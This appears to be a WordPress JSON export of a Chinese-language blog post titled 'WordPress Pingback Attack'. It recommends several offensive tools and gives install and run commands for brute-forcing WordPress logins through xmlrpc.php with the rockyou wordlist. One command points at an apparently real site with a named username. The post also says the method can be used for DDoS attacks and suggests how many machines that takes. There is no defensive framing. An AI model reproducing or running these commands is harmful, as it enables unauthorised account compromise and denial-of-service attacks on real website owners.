﻿{"id":1124,"date":"2022-10-14T05:21:42","date_gmt":"2022-10-13T21:21:42","guid":{"rendered":"https:\/\/byy3.com\/?p=1124"},"modified":"2022-10-14T05:28:05","modified_gmt":"2022-10-13T21:28:05","slug":"wordpress-pingback-attack","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1124","title":{"rendered":"WordPress Pingback Attack"},"content":{"rendered":"<h1 class=\"white mt-0\">WordPress Pingback Attack<\/h1>\n<p>https:\/\/github.com\/FireFart\/WordpressPingbackPortScanner\u00a0 \u00a0\u592a\u8001<\/p>\n<p>https:\/\/github.com\/n00py\/WPForce\u00a0 \u00a0 \u4f7f\u7528python2.7 \u4f7f\u7528apt-get install python2.7 \u7136\u540e\u5b89\u88c5pip install 2to3<\/p>\n<p>\u7136\u540e2to3 -w wpforce.py<\/p>\n<p>\u4f7f\u7528\u65b9\u6cd5python2.7 wpforce.py -i usr.txt -w .\/root\/rockyou.txt -u \"https:\/\/www.xxx.fr\"<\/p>\n<p>&nbsp;<\/p>\n<p>https:\/\/github.com\/aress31\/xmlrpc-bruteforcer<\/p>\n<pre class=\"notranslate\"><code>python xmlrpc-bruteforcer.py -u admin4572 -w \/root\/wpscan\/rockyou.txt -t 3 -x https:\/\/www.oserinvestir.fr\/xmlrpc.php\r\n\u53ef\u4ee5\u7528\u4e8e\u538b\u529b\u653b\u51fbddos \u53d1\u9001\u5927\u69821M\u7684\u6570\u636e\u8bf7\u6c42\uff0c\u5982\u679c\u4f7f\u75285\u53f0\u673a\u5668\u53ef\u8fbe\u5230\u653b\u51fb\u6548\u679c\r\n\r\nhttps:\/\/github.com\/relarizky\/wpxploit \u6548\u679c\u597d\u5f88\u63a8\u8350\u63a8\u8350\u6309\r\n$ git clone https:\/\/github.com\/relarizky\/wpxploit.git\r\n$ cd wpxploit\r\n$ pip3 install -r requirements.txt\r\n$ .\/exploit.py\r\n.\/exploit.py https:\/\/www.xxx.fr\/ 5 15\r\n\r\n\r\nhttps:\/\/github.com\/exploit-inters\/CMS-Attack \u6bd4\u8f83\u63a8\u8350\r\n\u9700\u8981\u4e0b\u8f7drockyou.txt\u5b57\u5178\u66ff\u6362\u539f\u6765data\u4e0b\u6570\u636e\u7528\u6237\u540d\u548c\u5bc6\u7801\uff0c\u7136\u540enano setting.json \u8bbe\u7f6e\u4ee3\u7406\r\n\r\nhttps:\/\/github.com\/Moham3dRiahi\/XAttacker\r\n<img decoding=\"async\" data-original=\"https:\/\/camo.githubusercontent.com\/b422bcdfa416fc93205d52070af95d389b6f0433b77004db6ee222f63952066f\/68747470733a2f2f692e6962622e636f2f6859314c7167432f53637265656e73686f742d61742d323032312d30372d33312d30392d30312d32332e706e67\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"WordPress Pingback Attack\u63d2\u56fe\" alt=\"WordPress Pingback Attack\u63d2\u56fe\" \/>\r\n<\/code><\/pre>\n<pre>git clone https:\/\/github.com\/Moham3dRiahi\/XAttacker.git\r\n<span class=\"pl-c1\">cd<\/span> XAttacker\r\nperl XAttacker.pl<\/pre>\n<pre class=\"notranslate\"><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>WordPress Pingback Attack https:\/\/github.com\/FireFart\/W [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,1],"tags":[756,757,755],"class_list":["post-1124","post","type-post","status-publish","format-standard","hentry","category-wordpress","category-net-security","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1124","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1124"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1124\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1124"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1124"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1124"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}